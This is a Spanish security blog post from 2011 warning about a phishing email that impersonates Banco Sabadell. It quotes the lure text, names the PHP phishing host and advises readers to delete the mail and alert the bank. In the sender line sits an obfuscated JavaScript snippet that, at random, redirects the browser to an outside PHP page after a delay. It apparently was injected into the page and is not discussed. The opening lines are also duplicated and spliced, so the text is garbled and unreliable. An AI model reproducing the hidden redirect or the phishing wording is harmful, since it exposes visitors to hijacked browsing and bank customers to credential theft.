Mucho cuidado con este mail que se recibe falsamente del Banco de Sabadell

Se están recibiendo mails como el que anexamos a continuacion, en el que todos los links llevan a la ejecucion de un PHP que se procesa en servidor de EE:UU:

 

MAIL MALICIOSO:
_____________________
Asunto:   (Fwd) Noticia de Banco Sabadell – Activar Nueva Sistema por SM
De:    todos los links llevan a la ejecucion de un PHP que se procesa en servidor de EE:UU:

 

MAIL MALICIOSO:
_____________________
Asunto:   (Fwd) Noticia de Banco Sabadell – Activar Nueva Sistema por SM
De:   
$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:Correo-BancSabadell@ImportanteAviss.new8.com”>Correo-BancSabadell@ImportanteAviss.new8.com
Date sent:        Sun, 17 Jul 2011 23:06:38 -0500

Nuestro equipo ha renovado su sistema de seguridad con
el servicio Clave por SMS.
Servicio tecnico del banco BancSabadell renovo el
software para mejorar el servicio
de los clientes del banco.
Para asegurar la integridad de sus datos Usted tiene que
activar Nueva Sistema y
confirmar su identidad con tarjeta de coordenadas.
Para empezar a rellenar el formulario haga click aqui:
http://www.bancsabadell.com/cs/Satellite/sms_sistema
Una vez que su identidad ha sido confirmada el acceso
a su cuenta será restaurado inmediatamente.

AVISO DE SEGURIDAD :
En BancSabadell trabajamos constantemente para
garantizar la confidencialidad de las comunicaciones
entre el Banco y el cliente .
*   Que el cliente está comunicando sus datos al centro
servidor de BancSabadell y no a cualquier otro que
intentara hacerse pasar por éste .
*   Que entre el cliente y el centro servidor de
BancSabadell los datos viajan cifrados, evitando su
posible lectura o manipulación por terceros .

Comisionado para la Defensa del Cliente de Servicios
Bancarios
Servicio de Reclamaciones
Alcalá 48, 28014 Madrid
Ficheros adjuntos:

WPM$76B8.PM$  2.9 k   [ application/octet-stream ]  Mail message body  Descargar

——- End of forwarded message ——-Dpto.Comercial

 

_____________________

FGN DEL MAIL MALICIOSO

todos los links conducen al mismo PHP, que lleva a una pagina phishing del Banco Sabadell, pidiendo DNI y password para entrar
http://<interceptado>.getdownloadsnow.com/.y/y.php
Dicha web que procesa el PHP está ubicada en

getdownloadsnow.com.  US  United States  IL  Illinois  Chicago  60690  41.8675  -87.6744

SU EJECUCION NO ES PELIGROSA SI NO SE ENTRAN DATOS, CLARO !!!

 

De todas formas mejor eliminar el mail de entrada, y si se ha ejecutado y entrado datos, avisar al Banco y cambiar cuentas antes de que desaparezca de alli el dinero …

saludos

ms, 18-7-2011

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies